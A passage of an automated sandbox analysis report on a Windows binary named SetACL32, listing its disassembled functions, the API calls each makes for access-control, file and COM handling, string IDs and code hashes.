                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: bbeaa21a40617438003eb7f82b31e562f3b08448d83e3aa5a29d043ca586a3db
                • Instruction ID: 7632aaa4fa192373f1f2690239f8d8ae45bf0638aa070abe9d38427bf70bbd15
                • Opcode Fuzzy Hash: bbeaa21a40617438003eb7f82b31e562f3b08448d83e3aa5a29d043ca586a3db
                • Instruction Fuzzy Hash: F0313B32A003019BFF31AE78DC45B5673E9AF023A0F145429E055DB1A6DF75AC86FB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F83AF0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 282commemoryCOMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F83B30
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • CoInitialize.OLE32(00000000), ref: 00F83C93
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000002,00000000), ref: 00F83CBF
                • CoCreateInstance.OLE32(00FAF698,00000000,00000001,00FAF6A8,00000000), ref: 00F83CE9
                • SysAllocStringLen.OLEAUT32(00F80CBD,00000000), ref: 00F83D08
                • SysFreeString.OLEAUT32(00000000), ref: 00F83D2D
                • CoQueryProxyBlanket.OLE32(00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 00F83D57
                • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,?,00000003,000000FF,00000800), ref: 00F83D76
                • CoUninitialize.OLE32 ref: 00F83DC1
                  • Part of subcall function 00F837A0: SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83801
                  • Part of subcall function 00F837A0: SysAllocString.OLEAUT32(GetSD), ref: 00F83854
                  • Part of subcall function 00F837A0: SysFreeString.OLEAUT32(-00000001), ref: 00F83A2E
                • VariantClear.OLEAUT32 ref: 00F83E31
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: String$Alloc$BlanketFreeInitializeLockitProxystd::_std::locale::_$ClearCreateH_prolog3InitInstanceLockit::_Lockit::~_QuerySecuritySetgloballocaleUninitializeVariant
                • String ID: \\.\
                • API String ID: 3821683838-2900601889
                • Opcode ID: e1a690284c239c2b9949215351f1d6a6e98725b4df3e4b9b45ef5726f7c2687d
                • Instruction ID: 50eafefe2df8573ec548a8753a0dfa9f23d363814a586e94df5e719a7ca713d3
                • Opcode Fuzzy Hash: e1a690284c239c2b9949215351f1d6a6e98725b4df3e4b9b45ef5726f7c2687d
                • Instruction Fuzzy Hash: 9CA1F271A00108AFDB04EFA4DC85FDE7BB9EF85720F244218F511AB2E0DB74AA45DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA7155 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 273COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00FA6E9C: CreateFileW.KERNEL32(00000000,00000000,?,00FA71FE,?,?,00000000,?,00FA71FE,00000000,0000000C), ref: 00FA6EB9
                • GetLastError.KERNEL32 ref: 00FA7269
                • __dosmaperr.LIBCMT ref: 00FA7270
                • GetFileType.KERNEL32(00000000), ref: 00FA727C
                • GetLastError.KERNEL32 ref: 00FA7286
                • __dosmaperr.LIBCMT ref: 00FA728F
                • CloseHandle.KERNEL32(00000000), ref: 00FA72AF
                • CloseHandle.KERNEL32(00000000), ref: 00FA73FC
                • GetLastError.KERNEL32 ref: 00FA742E
                • __dosmaperr.LIBCMT ref: 00FA7435
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: @M)w$H
                • API String ID: 4237864984-462586194
                • Opcode ID: e2c7333d58d8b2d9484c7db778386d5d0d5dab2c27e54f561a5599a482cd663d
                • Instruction ID: 026086f82a125ef42d7c952696f5766c11c40648a7442dee084031485491e219
                • Opcode Fuzzy Hash: e2c7333d58d8b2d9484c7db778386d5d0d5dab2c27e54f561a5599a482cd663d
                • Instruction Fuzzy Hash: 68A12972A042488FCF19EF68DC52BAE3BE5AB07320F140159F811EF291D7399D16EB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82BE0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 239COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,746D712B), ref: 00F82C89
                • GetLastError.KERNEL32 ref: 00F82C93
                • GetAce.ADVAPI32(?,00000000,00000000), ref: 00F82CB8
                • IsValidSid.ADVAPI32(-00000008), ref: 00F82CDA
                • IsValidSid.ADVAPI32(-00000008), ref: 00F82CFC
                • GetLengthSid.ADVAPI32(-00000008), ref: 00F82D07
                • CopySid.ADVAPI32(?,00000000,-00000008), ref: 00F82D26
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$CopyErrorInformationLastLength
                • String ID: @M)w
                • API String ID: 480852179-1211491014
                • Opcode ID: 2b5b8db70b06c8b1016a105bbe8cc078d3559113c6f523918f8d68d0c7cc3b5c
                • Instruction ID: 5ae9a2591b622de6d889e041ba759e5437f6d96396c2e60bef4a34104a35a6b4
                • Opcode Fuzzy Hash: 2b5b8db70b06c8b1016a105bbe8cc078d3559113c6f523918f8d68d0c7cc3b5c
                • Instruction Fuzzy Hash: 0081B3B1E002589BDF50EFA4CD84BDEBBB8FF04710F144519E805EB245D778AA44EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97570 Relevance: 18.4, APIs: 12, Instructions: 374COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: ec21166de93953b49ef616e6b33bb09ddd0ad6474e087fa91ec76af199dbf9ed
                • Instruction ID: edd730f3ab9751b7aa8631615b50385b48135b895350b7e067a21b1c9cac5051
                • Opcode Fuzzy Hash: ec21166de93953b49ef616e6b33bb09ddd0ad6474e087fa91ec76af199dbf9ed
                • Instruction Fuzzy Hash: 53C13476E44308ABEF20EBA8CC46FDE77F8AF08700F154165FA04EB282D6759941EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA4F28 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: @M)w
                • API String ID: 0-1211491014
                • Opcode ID: cc7444c3db22cf2820a0a2ce10f802231e4d5b40efb0c897275259b82c2dcc5a
                • Instruction ID: 9d7730bd8f41ed2320c782f2e9e62537625d70659a4c269f9b91e0a5a072865b
                • Opcode Fuzzy Hash: cc7444c3db22cf2820a0a2ce10f802231e4d5b40efb0c897275259b82c2dcc5a
                • Instruction Fuzzy Hash: 02C1E0B1E04649AFDF11DF98CC81BBEBBF4AF4A710F144059E911AB292C7789D41EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8056C Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 316registryfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F621B0: GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                  • Part of subcall function 00F621B0: OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                  • Part of subcall function 00F621B0: GetLastError.KERNEL32 ref: 00F62219
                • CreateFileW.KERNEL32(?,000C0000,00000000,00000000,00000003,02200000,00000000), ref: 00F806C3
                • GetLastError.KERNEL32 ref: 00F806E7
                • SetSecurityInfo.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00F807DE
                • NetShareGetInfo.NETAPI32(-0000001C,?,00000001,00000000,00000000,?,?,746D712B,00FBFE30,00000003,00000000), ref: 00F809E6
                • NetApiBufferFree.NETAPI32(00000000), ref: 00F80A2E
                • SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,00000000,?,746D712B,00FBFE30,00000003,00000000), ref: 00F80A68
                • NetShareSetInfo.NETAPI32(-0000001C,?,00000001,?,00000000), ref: 00F80ABA
                • CloseHandle.KERNEL32(00000000), ref: 00F80AD7
                • RegCloseKey.ADVAPI32(00000000), ref: 00F80AE8
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                • String ID: @M)w$SeSecurityPrivilege
                • API String ID: 4090370659-2039830501
                • Opcode ID: 8fdffbf691abefc92b9eab0b570742525052aab2dc67dbdb2a2781a691ac098e
                • Instruction ID: 98e2e95f43b88ac2e2f19f928de2247826025b2f7d56a4d06a3bc1b78840fbbc
                • Opcode Fuzzy Hash: 8fdffbf691abefc92b9eab0b570742525052aab2dc67dbdb2a2781a691ac098e
                • Instruction Fuzzy Hash: 98C1D170E00219DBEF64EF64CC45BEE77B5AF44314F444199E809A7281DB74AE88DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97108 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 5ee1f7a8f0cfc0d5327362af5399dcd6aa3ba871907b0d5c077a3b63080e604c
                • Instruction ID: 877ad217040908eb56e8c80d1ad57dd346568fd9f41211938b9db845d699b51b
                • Opcode Fuzzy Hash: 5ee1f7a8f0cfc0d5327362af5399dcd6aa3ba871907b0d5c077a3b63080e604c
                • Instruction Fuzzy Hash: 30218776900108AFDF41EF94CC41DDE7BB9AF08380F0141A5F5159B166EB35EA99EF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F85150 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 456COMMON
                Download Yara Rule
                APIs
                • CreateDirectoryW.KERNEL32(?,00000000,746D712B,?,?), ref: 00F851BB
                • GetLastError.KERNEL32 ref: 00F851C9
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$Time$CreateCriticalCurrentDirectoryEnterFileNameSectionSystemThreadUser
                • String ID: ' could not be created because: $@M)w$CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                • API String ID: 3233469328-3060264401
                • Opcode ID: 8320b3cbfb2906812941f30eb419207dccc81b27fcd87af855a12ecded732a5b
                • Instruction ID: 1bc35020bc6bf17f2188f1a27ed0cf95f060a5c4300ccaaa02ac49edfbf00a20
                • Opcode Fuzzy Hash: 8320b3cbfb2906812941f30eb419207dccc81b27fcd87af855a12ecded732a5b
                • Instruction Fuzzy Hash: D1022531E00148DBEF08EF68CD85BDDB776EF85704F24C258E414AB296DB78AA84DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8E22A Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00F8E327
                • ___TypeMatch.LIBVCRUNTIME ref: 00F8E458
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00F8E52A
                • _UnwindNestedFrames.LIBCMT ref: 00F8E5AE
                • CallUnexpected.LIBVCRUNTIME ref: 00F8E5C9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwind
                • String ID: csm$csm$csm
                • API String ID: 1184646756-393685449
                • Opcode ID: 0ff08bc2c1d193610d767da126e8fc65be7250a23efc375711adbdcdfc36a7fe
                • Instruction ID: d4aeb1fbcb98787373a35ddfc5dc679ba1336b4720f7b14d3ca4dadefe67b56e
                • Opcode Fuzzy Hash: 0ff08bc2c1d193610d767da126e8fc65be7250a23efc375711adbdcdfc36a7fe
                • Instruction Fuzzy Hash: 2EB17872D00209EFCF29FFA4C8819EEBBB5BF14324B144159F815AB252E734DA51EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F65D10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 237COMMON
                Download Yara Rule
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D63
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D85
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65DA5
                • std::_Facet_Register.LIBCPMT ref: 00F65F73
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65F8B
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F65FB0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                • String ID: false$true
                • API String ID: 2081738530-2658103896
                • Opcode ID: 461c3296b321ee3e467ef483e4d939766463157ab4242c8bb30a273f2c6605a6
                • Instruction ID: e36619249a85b69d80717aeaf999a0cb38117ef9245f1b0a5022c53856c2bcf5
                • Opcode Fuzzy Hash: 461c3296b321ee3e467ef483e4d939766463157ab4242c8bb30a273f2c6605a6
                • Instruction Fuzzy Hash: 9791D0B1D00748DBDB20DFA4CC41BEEB7F4EF04714F14825AE845AB281EB75AA45DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F824E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 217COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F82551
                • GetLastError.KERNEL32 ref: 00F8255B
                • GetAce.ADVAPI32(?,00000000,00000000), ref: 00F82596
                • EqualSid.ADVAPI32(00000008,00000008), ref: 00F825D7
                • DeleteAce.ADVAPI32(?,00000000), ref: 00F8260E
                • GetLastError.KERNEL32(?,00000000,?), ref: 00F82647
                • GetLastError.KERNEL32 ref: 00F82700
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$DeleteEqualInformation
                • String ID: @M)w
                • API String ID: 1965898034-1211491014
                • Opcode ID: 09c49671800751d6ed5277ae541abd3c9a2d7f25ebb14594679ff441833c0fcd
                • Instruction ID: 3bc42d71c448be6453f5de52ad1e56dba9ecd740f392fd0c9a617dc0db1c4ddc
                • Opcode Fuzzy Hash: 09c49671800751d6ed5277ae541abd3c9a2d7f25ebb14594679ff441833c0fcd
                • Instruction Fuzzy Hash: BD71D1B1E002099BDB60EF69D8A5BEEB7E4FF04324F08411AE8059B241DB35ED50EBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9FB04 Relevance: 13.7, APIs: 9, Instructions: 208COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free_wcschr
                • String ID:
                • API String ID: 3422831350-0
                • Opcode ID: 727cb9bf0495dbe308845ea54ef2a9b68110a66bda30f49c157318a17082c216
                • Instruction ID: 47d37a3a314bc96a553f76c5c565a78805e98e9479bfbd2e596813440485262e
                • Opcode Fuzzy Hash: 727cb9bf0495dbe308845ea54ef2a9b68110a66bda30f49c157318a17082c216
                • Instruction Fuzzy Hash: B95116B2D003069BEF20AF74CC92A6AB7A4AF05324F15453AFA01D7281EB749D49B790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97990 Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: da15aaf098d3bf1ea6d7ba4770c2072ab3fceaa19f5f4405bfee0b70aa043d90
                • Instruction ID: fa6061cc4c6e83b239dd015863916540c41ec79d86f0e30c3f145ad55a8d9812
                • Opcode Fuzzy Hash: da15aaf098d3bf1ea6d7ba4770c2072ab3fceaa19f5f4405bfee0b70aa043d90
                • Instruction Fuzzy Hash: 7E61F4729183059FEF20EF75C841BAAB7F8EF45320F24406AE945EB295EB719D40EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA0F61 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 318fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00FA0FA9
                • __fassign.LIBCMT ref: 00FA1188
                • __fassign.LIBCMT ref: 00FA11A5
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FA11ED
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FA122D
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FA12D9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FileWrite__fassign$ConsoleErrorLast
                • String ID: @M)w
                • API String ID: 4031098158-1211491014
                • Opcode ID: 741640dab57f6d9e2f50ed93730891d6563dfa3dc0ccd31dda3b556e7ade9578
                • Instruction ID: 0dbb60bc3bc9c212f5576e52f36de9f669d9cd9ca82935bba88e200f40a26dc0
                • Opcode Fuzzy Hash: 741640dab57f6d9e2f50ed93730891d6563dfa3dc0ccd31dda3b556e7ade9578
                • Instruction Fuzzy Hash: C5D1CFB5D002989FCF15CFE8C880AEDBBB9BF4A314F294169E855FB241D730A945DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F899B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 173COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F88BB0: IsValidSid.ADVAPI32(00F89605,00000000,00000000,00000000,00000000,00000000,000000FF,?,00F89605,00000000,?,?), ref: 00F88BC8
                  • Part of subcall function 00F88BB0: GetLengthSid.ADVAPI32(00000000,00F89605,?,00F89605,00000000,?,?), ref: 00F88BD9
                • IsValidSid.ADVAPI32(04444444,04444444,?,?,00000000,00000000,?,?,?,00F898C1,?), ref: 00F89A51
                • IsValidSid.ADVAPI32(04444444,?,?,00F898C1,?,?,?,?,?,?,000000FF), ref: 00F89A63
                • EqualSid.ADVAPI32(04444444,04444444,?,?,00F898C1,?,?,?,?,?,?,000000FF), ref: 00F89A73
                Strings
                • invalid hash bucket count, xrefs: 00F89B5A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$EqualLength
                • String ID: invalid hash bucket count
                • API String ID: 2688289545-1101463472
                • Opcode ID: 48c9cc54e70855348009fd938d7a2398f475e1674b48fa6ac20462b5f3780a19
                • Instruction ID: 4463b21a8a107d32ba3a90e9450b9ece54e39cce3f0a8f98a5b02f72dc790905
                • Opcode Fuzzy Hash: 48c9cc54e70855348009fd938d7a2398f475e1674b48fa6ac20462b5f3780a19
                • Instruction Fuzzy Hash: D36102B4A04206DFCB14DF29C5809AAFBF8FF48310718C5A9E859DB715D7B0EA51EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82A80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(00790073,00F7965F,0000000C,00000002,?), ref: 00F82AE7
